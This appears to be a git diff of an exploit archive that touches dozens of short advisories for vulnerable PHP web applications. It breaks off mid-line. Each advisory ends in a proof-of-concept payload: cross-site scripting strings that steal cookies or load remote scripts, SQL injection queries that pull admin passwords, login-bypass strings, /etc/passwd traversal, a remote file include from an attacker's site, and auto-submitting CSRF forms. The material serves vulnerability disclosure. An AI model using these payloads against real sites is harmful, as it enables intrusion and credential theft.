An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E \ No newline at end of file +http://www.example.com/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34012.txt b/platforms/php/webapps/34012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34014.txt b/platforms/php/webapps/34014.txt old mode 100755 new mode 100644 index e981ba8a8..eb393dbba --- a/platforms/php/webapps/34014.txt +++ b/platforms/php/webapps/34014.txt @@ -4,4 +4,4 @@ Web 2.0 Social Network Freunde Community System is prone to an SQL-injection vul Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/cms/user.php?toDo=showgallery&id=999999999999+UNION+SELECT+1,concat(password,0x3a,id),3,4,5,6,7,8,9,10,11,12,13,14+from+admin \ No newline at end of file +http://www.example.com/cms/user.php?toDo=showgallery&id=999999999999+UNION+SELECT+1,concat(password,0x3a,id),3,4,5,6,7,8,9,10,11,12,13,14+from+admin \ No newline at end of file diff --git a/platforms/php/webapps/34015.txt b/platforms/php/webapps/34015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34016.txt b/platforms/php/webapps/34016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34017.txt b/platforms/php/webapps/34017.txt old mode 100755 new mode 100644 index c79eef693..5f92d0bae --- a/platforms/php/webapps/34017.txt +++ b/platforms/php/webapps/34017.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to include an arbitrary remote file contain The issues affect Snipe Gallery versions 3.1.5 and prior. -http://www.example.com/image.php?cfg_admin_path=[shell.txt ] \ No newline at end of file +http://www.example.com/image.php?cfg_admin_path=[shell.txt ] \ No newline at end of file diff --git a/platforms/php/webapps/3402.php b/platforms/php/webapps/3402.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34021.txt b/platforms/php/webapps/34021.txt old mode 100755 new mode 100644 index 4fd963b5f..aa4ce01b6 --- a/platforms/php/webapps/34021.txt +++ b/platforms/php/webapps/34021.txt @@ -4,4 +4,4 @@ The 'com_horses' component for Joomla! is prone to an SQL-injection vulnerabilit Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6-- \ No newline at end of file +http://www.example.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6-- \ No newline at end of file diff --git a/platforms/php/webapps/34022.txt b/platforms/php/webapps/34022.txt old mode 100755 new mode 100644 index ee12fe9f9..131443133 --- a/platforms/php/webapps/34022.txt +++ b/platforms/php/webapps/34022.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Stiva SHOPPING CART 1.0 is vulnerable; other versions may be affected as well. -http://www.example.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34023.txt b/platforms/php/webapps/34023.txt old mode 100755 new mode 100644 index 278df4543..06abd0ef3 --- a/platforms/php/webapps/34023.txt +++ b/platforms/php/webapps/34023.txt @@ -11,4 +11,4 @@ The following example URIs are available: http://www.example.com/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E http://www.example.com/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E http://www.example.com/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+ -http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+ \ No newline at end of file +http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+ \ No newline at end of file diff --git a/platforms/php/webapps/34024.txt b/platforms/php/webapps/34024.txt old mode 100755 new mode 100644 index 90512c15b..3eb8e0520 --- a/platforms/php/webapps/34024.txt +++ b/platforms/php/webapps/34024.txt @@ -4,4 +4,4 @@ Triburom is prone to a cross-site scripting vulnerability because it fails to pr An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34025.txt b/platforms/php/webapps/34025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34029.txt b/platforms/php/webapps/34029.txt old mode 100755 new mode 100644 index 4d044cc0d..02e7b315c --- a/platforms/php/webapps/34029.txt +++ b/platforms/php/webapps/34029.txt @@ -8,4 +8,4 @@ Parent Connect 2010.4.11 is vulnerable; other versions may also be affected. The following example data is available: -password: ' OR '1'='1 \ No newline at end of file +password: ' OR '1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/3403.php b/platforms/php/webapps/3403.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34031.txt b/platforms/php/webapps/34031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34032.txt b/platforms/php/webapps/34032.txt old mode 100755 new mode 100644 index a7f3c52ff..0748c6cc6 --- a/platforms/php/webapps/34032.txt +++ b/platforms/php/webapps/34032.txt @@ -8,4 +8,4 @@ NPDS Revolution 10.02 is vulnerable; prior versions may also be affected. The following example request is available: -<img src="http://www.example.com/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1"> \ No newline at end of file +<img src="http://www.example.com/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1"> \ No newline at end of file diff --git a/platforms/php/webapps/34035.sjs b/platforms/php/webapps/34035.sjs old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34038.txt b/platforms/php/webapps/34038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34040.txt b/platforms/php/webapps/34040.txt old mode 100755 new mode 100644 index 7fb1e824b..733311d37 --- a/platforms/php/webapps/34040.txt +++ b/platforms/php/webapps/34040.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect razorCMS 1.0 Stable is vulnerable; other versions may also be affected. -<form action="http://www.example.com/admin/?action=edit&slab=home" method="post" name="main" > <input type="hidden" name="title" value="Home" /> <input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' /> <input type="hidden" name="ptitle" value="" /> <input type="hidden" name="theme" value="theme-default" /> <input type="hidden" name="check_sidebar" value="sidebar" /> <input type="hidden" name="save" value="Save Content" /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://www.example.com/admin/?action=edit&slab=home" method="post" name="main" > <input type="hidden" name="title" value="Home" /> <input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' /> <input type="hidden" name="ptitle" value="" /> <input type="hidden" name="theme" value="theme-default" /> <input type="hidden" name="check_sidebar" value="sidebar" /> <input type="hidden" name="save" value="Save Content" /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34041.txt b/platforms/php/webapps/34041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34042.txt b/platforms/php/webapps/34042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34043.txt b/platforms/php/webapps/34043.txt old mode 100755 new mode 100644 index 7d91d19e3..12c336d8f --- a/platforms/php/webapps/34043.txt +++ b/platforms/php/webapps/34043.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc 360 Web Manager 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+ \ No newline at end of file +http://www.example.com/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+ \ No newline at end of file diff --git a/platforms/php/webapps/34044.txt b/platforms/php/webapps/34044.txt old mode 100755 new mode 100644 index 352d6dd72..fb788f40d --- a/platforms/php/webapps/34044.txt +++ b/platforms/php/webapps/34044.txt @@ -4,4 +4,4 @@ md5 Encryption Decryption PHP Script is prone to a cross-site scripting vulnerab An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/MD5/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file +http://www.example.com/MD5/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/34045.txt b/platforms/php/webapps/34045.txt old mode 100755 new mode 100644 index bad59b118..29984bc55 --- a/platforms/php/webapps/34045.txt +++ b/platforms/php/webapps/34045.txt @@ -4,4 +4,4 @@ BackLinkSpider is prone to an SQL-injection vulnerability because it fails to su Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb-- \ No newline at end of file +http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb-- \ No newline at end of file diff --git a/platforms/php/webapps/34053.txt b/platforms/php/webapps/34053.txt old mode 100755 new mode 100644 index 3427bc672..ba69e976d --- a/platforms/php/webapps/34053.txt +++ b/platforms/php/webapps/34053.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++ -http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc \ No newline at end of file +http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc \ No newline at end of file diff --git a/platforms/php/webapps/34054.txt b/platforms/php/webapps/34054.txt old mode 100755 new mode 100644 index 996679831..6dfe5c719 --- a/platforms/php/webapps/34054.txt +++ b/platforms/php/webapps/34054.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects version 1.8.6.1; other versions may also be vulnerable. -http://www.example.com/path/page.php?theme=http://attacker's site \ No newline at end of file +http://www.example.com/path/page.php?theme=http://attacker's site \ No newline at end of file diff --git a/platforms/php/webapps/34055.txt b/platforms/php/webapps/34055.txt old mode 100755 new mode 100644 index ea7a5429e..058c4fa0d --- a/platforms/php/webapps/34055.txt +++ b/platforms/php/webapps/34055.txt @@ -5,4 +5,4 @@ CMScout is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following example input to the 'search' field is available: -<marquee><font color=Blue size=15>XroGuE</font></marquee> \ No newline at end of file +<marquee><font color=Blue size=15>XroGuE</font></marquee> \ No newline at end of file diff --git a/platforms/php/webapps/34057.txt b/platforms/php/webapps/34057.txt old mode 100755 new mode 100644 index b519289a4..69ff732e8 --- a/platforms/php/webapps/34057.txt +++ b/platforms/php/webapps/34057.txt @@ -4,4 +4,4 @@ wsCMS is prone to a cross-site scripting vulnerability because it fails to prope An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script> \ No newline at end of file +http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script> \ No newline at end of file diff --git a/platforms/php/webapps/34062.txt b/platforms/php/webapps/34062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34067.txt b/platforms/php/webapps/34067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34068.html b/platforms/php/webapps/34068.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34070.txt b/platforms/php/webapps/34070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34071.txt b/platforms/php/webapps/34071.txt old mode 100755 new mode 100644 index 55d331cc9..7df3ca52b --- a/platforms/php/webapps/34071.txt +++ b/platforms/php/webapps/34071.txt @@ -4,4 +4,4 @@ The 'com_sar_news' component for Joomla! is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering \ No newline at end of file +http://www.example.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering \ No newline at end of file diff --git a/platforms/php/webapps/34072.txt b/platforms/php/webapps/34072.txt old mode 100755 new mode 100644 index f348aa939..0c3e88727 --- a/platforms/php/webapps/34072.txt +++ b/platforms/php/webapps/34072.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Hexjector 1.0.7.2 is vulnerable; other versions may be affected. -http://www.example.com/Hexjector/hexjector.php?site=<iframe src="http://localhost/hexjector/" height=0 width=0></iframe>&injsubmit=Submit+Query&custom_parameter= \ No newline at end of file +http://www.example.com/Hexjector/hexjector.php?site=<iframe src="http://localhost/hexjector/" height=0 width=0></iframe>&injsubmit=Submit+Query&custom_parameter= \ No newline at end of file diff --git a/platforms/php/webapps/34077.txt b/platforms/php/webapps/34077.txt old mode 100755 new mode 100644 index b17732619..d283ce4f2 --- a/platforms/php/webapps/34077.txt +++ b/platforms/php/webapps/34077.txt @@ -6,4 +6,4 @@ Attackers can exploit this vulnerability to gain administrative access to the af The following example data is available: -javascript:document.cookie = "kullanici=; path=/"; \ No newline at end of file +javascript:document.cookie = "kullanici=; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/34078.txt b/platforms/php/webapps/34078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34079.txt b/platforms/php/webapps/34079.txt old mode 100755 new mode 100644 index ec78647e0..a938fda85 --- a/platforms/php/webapps/34079.txt +++ b/platforms/php/webapps/34079.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Sniggabo CMS 2.21 is vulnerable; other versions may be affected. -http://www.example.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh4Ã?3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca \ No newline at end of file +http://www.example.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh4Ã?3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca \ No newline at end of file diff --git a/platforms/php/webapps/34081.txt b/platforms/php/webapps/34081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34082.txt b/platforms/php/webapps/34082.txt old mode 100755 new mode 100644 index 04e186ab4..c2d1817b2 --- a/platforms/php/webapps/34082.txt +++ b/platforms/php/webapps/34082.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Obsession-Design Image-Gallery 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/demos/odig/display.php?folder=/>"><script>alert(123456789)</script> \ No newline at end of file +http://www.example.com/demos/odig/display.php?folder=/>"><script>alert(123456789)</script> \ No newline at end of file diff --git a/platforms/php/webapps/34083.txt b/platforms/php/webapps/34083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34084.txt b/platforms/php/webapps/34084.txt old mode 100755 new mode 100644 index 3131143bc..5c5ec9a88 --- a/platforms/php/webapps/34084.txt +++ b/platforms/php/webapps/34084.txt @@ -11,4 +11,4 @@ The following example URIs are available: http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27 -http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA \ No newline at end of file +http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA \ No newline at end of file diff --git a/platforms/php/webapps/34085.txt b/platforms/php/webapps/34085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34087.txt b/platforms/php/webapps/34087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34089.txt b/platforms/php/webapps/34089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3409.htm b/platforms/php/webapps/3409.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34091.txt b/platforms/php/webapps/34091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34095.txt b/platforms/php/webapps/34095.txt old mode 100755 new mode 100644 index 4dbf7ba49..ac6004bf6 --- a/platforms/php/webapps/34095.txt +++ b/platforms/php/webapps/34095.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example data is available: -password: 'or' 1=1 \ No newline at end of file +password: 'or' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/34096.txt b/platforms/php/webapps/34096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34097.txt b/platforms/php/webapps/34097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3410.htm b/platforms/php/webapps/3410.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34100.txt b/platforms/php/webapps/34100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34105.txt b/platforms/php/webapps/34105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34106.txt b/platforms/php/webapps/34106.txt old mode 100755 new mode 100644 index fb8979e89..c9647e8a3 --- a/platforms/php/webapps/34106.txt +++ b/platforms/php/webapps/34106.txt @@ -4,4 +4,4 @@ cPanel Image Manager is prone to a local file-include vulnerability because it f An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process, which may aid in further attacks. -http://www.example.com/frontend/x3/cpanelpro/doconvert.html?target=/etc/ \ No newline at end of file +http://www.example.com/frontend/x3/cpanelpro/doconvert.html?target=/etc/ \ No newline at end of file diff --git a/platforms/php/webapps/34107.txt b/platforms/php/webapps/34107.txt old mode 100755 new mode 100644 index d6d790276..63e7d0713 --- a/platforms/php/webapps/34107.txt +++ b/platforms/php/webapps/34107.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow boastMachine 3.1 is vulnerable; other versions may be affected. -http://www.example.com/?action=search&title=item&blog=1&key=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/?action=search&title=item&blog=1&key=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34109.html b/platforms/php/webapps/34109.html old mode 100755 new mode 100644 index 92501295a..9ffb88dc5 --- a/platforms/php/webapps/34109.html +++ b/platforms/php/webapps/34109.html @@ -6,4 +6,4 @@ An attacker can exploit these issues to gain unauthorized access, obtain potenti log1 CMS 2.0 is vulnerable; other versions may be affected. -<form action="http://example.com/admin/main.php?action=savefile" method="post" name="main" > <input name="content" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' /> <input type="hidden" name="filename" value="menupage1_page" /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://example.com/admin/main.php?action=savefile" method="post" name="main" > <input name="content" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' /> <input type="hidden" name="filename" value="menupage1_page" /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34110.txt b/platforms/php/webapps/34110.txt old mode 100755 new mode 100644 index d2f53d0ca..43c37ae06 --- a/platforms/php/webapps/34110.txt +++ b/platforms/php/webapps/34110.txt @@ -12,4 +12,4 @@ http://www.example.com/vehicle/buy_do_search/?order_direction=DESC&&status=1&for Cross Site Scripting -http://www.example.com/vehicle/buy_do_search/?order_direction=[XSS] \ No newline at end of file +http://www.example.com/vehicle/buy_do_search/?order_direction=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34116.txt b/platforms/php/webapps/34116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34117.txt b/platforms/php/webapps/34117.txt old mode 100755 new mode 100644 index 5d0510395..556148749 --- a/platforms/php/webapps/34117.txt +++ b/platforms/php/webapps/34117.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to obtain potentially sensitive in Bits Video Script 2.05 Gold Beta is vulnerable; other versions may also be affected. - http://www.example.com/Video/showcase2search.php?rowptem[template]=[EV!L] \ No newline at end of file + http://www.example.com/Video/showcase2search.php?rowptem[template]=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/34118.txt b/platforms/php/webapps/34118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34119.txt b/platforms/php/webapps/34119.txt old mode 100755 new mode 100644 index c97618dce..799a21d46 --- a/platforms/php/webapps/34119.txt +++ b/platforms/php/webapps/34119.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to upload arbitrary code and run i Bits Video Script 2.04 and 2.05 Gold Beta are vulnerable; other versions may also be affected. -http://www.example.com/Video/addvideo.php \ No newline at end of file +http://www.example.com/Video/addvideo.php \ No newline at end of file diff --git a/platforms/php/webapps/34120.txt b/platforms/php/webapps/34120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34121.txt b/platforms/php/webapps/34121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34124.txt b/platforms/php/webapps/34124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34127.txt b/platforms/php/webapps/34127.txt old mode 100755 new mode 100644 index b28848789..f31cfe354 --- a/platforms/php/webapps/34127.txt +++ b/platforms/php/webapps/34127.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Arab Portal 2.2 is vulnerable; other versions may also be affected. -http://www.example.com/apt/members.php?action=msearch&by=[SQL] \ No newline at end of file +http://www.example.com/apt/members.php?action=msearch&by=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34138.txt b/platforms/php/webapps/34138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34140.txt b/platforms/php/webapps/34140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34141.txt b/platforms/php/webapps/34141.txt old mode 100755 new mode 100644 index 1cc5b5de0..f5ab7e459 --- a/platforms/php/webapps/34141.txt +++ b/platforms/php/webapps/34141.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AneCMS 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63 \ No newline at end of file +http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63 \ No newline at end of file diff --git a/platforms/php/webapps/34142.txt b/platforms/php/webapps/34142.txt old mode 100755 new mode 100644 index 4e89d19cd..de49bf179 --- a/platforms/php/webapps/34142.txt +++ b/platforms/php/webapps/34142.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a MODx 1.0.3 is vulnerable; other versions may also be affected. http://www.example.com/manager/index.php?id=4%27+ANY_SQL&a=16 -http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE \ No newline at end of file +http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE \ No newline at end of file diff --git a/platforms/php/webapps/34146.txt b/platforms/php/webapps/34146.txt old mode 100755 new mode 100644 index cb21c66b1..f01a59d9e --- a/platforms/php/webapps/34146.txt +++ b/platforms/php/webapps/34146.txt @@ -8,4 +8,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data are available: Username: a' or '1'='1 -Password: a' or '1'='1 \ No newline at end of file +Password: a' or '1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/34147.txt b/platforms/php/webapps/34147.txt old mode 100755 new mode 100644 index 46d2c7984..10f9be21d --- a/platforms/php/webapps/34147.txt +++ b/platforms/php/webapps/34147.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow JForum 2.1.8 is vulnerable; other versions may also be affected. -http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=â?><script src=â?http://example.org/test.jsâ?></script><div \ No newline at end of file +http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=â?><script src=â?http://example.org/test.jsâ?></script><div \ No newline at end of file diff --git a/platforms/php/webapps/34153.txt b/platforms/php/webapps/34153.txt old mode 100755 new mode 100644 index 4ebf266c2..bea305ca7 --- a/platforms/php/webapps/34153.txt +++ b/platforms/php/webapps/34153.txt @@ -12,4 +12,4 @@ http://www.example.com/products/orkutclone/view_photo.php?page=3&alb=[SQLI] Cross site Scripting: -http://www.example.com/products/orkutclone/scrapbook.php?id=[XSS] \ No newline at end of file +http://www.example.com/products/orkutclone/scrapbook.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34155.txt b/platforms/php/webapps/34155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34157.txt b/platforms/php/webapps/34157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34159.txt b/platforms/php/webapps/34159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34161.txt b/platforms/php/webapps/34161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34166.txt b/platforms/php/webapps/34166.txt old mode 100755 new mode 100644 index 1ed7dde99..aa63207b0 --- a/platforms/php/webapps/34166.txt +++ b/platforms/php/webapps/34166.txt @@ -4,4 +4,4 @@ KubeSupport is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/KubeSupport/install/index.php?lang=[SQLI] \ No newline at end of file +http://www.example.com/KubeSupport/install/index.php?lang=[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/34169.txt b/platforms/php/webapps/34169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34170.txt b/platforms/php/webapps/34170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34173.txt b/platforms/php/webapps/34173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34175.txt b/platforms/php/webapps/34175.txt old mode 100755 new mode 100644 index ebb751843..296c76fb3 --- a/platforms/php/webapps/34175.txt +++ b/platforms/php/webapps/34175.txt @@ -5,4 +5,4 @@ SaffaTunes CMS is prone to multiple SQL-injection vulnerabilities because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/cms/news.php?id=9[CODE] -http://www.example.com/cms/news.php?year=2010[CODE] \ No newline at end of file +http://www.example.com/cms/news.php?year=2010[CODE] \ No newline at end of file diff --git a/platforms/php/webapps/34176.html b/platforms/php/webapps/34176.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34177.txt b/platforms/php/webapps/34177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34181.txt b/platforms/php/webapps/34181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34183.txt b/platforms/php/webapps/34183.txt old mode 100755 new mode 100644 index 639ead77d..f886e3f3c --- a/platforms/php/webapps/34183.txt +++ b/platforms/php/webapps/34183.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Jamroom versions prior to 4.1.9 are vulnerable. -http://www.example.com/forum.php?mode=modify&band_id=0&t=<T>&c=<C>&post_id=<POST_ID>%00%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/forum.php?mode=modify&band_id=0&t=<T>&c=<C>&post_id=<POST_ID>%00%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34185.txt b/platforms/php/webapps/34185.txt old mode 100755 new mode 100644 index 724cd6f1f..1b162fc1e --- a/platforms/php/webapps/34185.txt +++ b/platforms/php/webapps/34185.txt @@ -4,4 +4,4 @@ Pre Multi-Vendor Shopping Malls is prone to an SQL-injection vulnerability becau Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/products.php?sid=1 (SQL) \ No newline at end of file +http://www.example.com/[path]/products.php?sid=1 (SQL) \ No newline at end of file diff --git a/platforms/php/webapps/34189.txt b/platforms/php/webapps/34189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34190.txt b/platforms/php/webapps/34190.txt old mode 100755 new mode 100644 diff --git 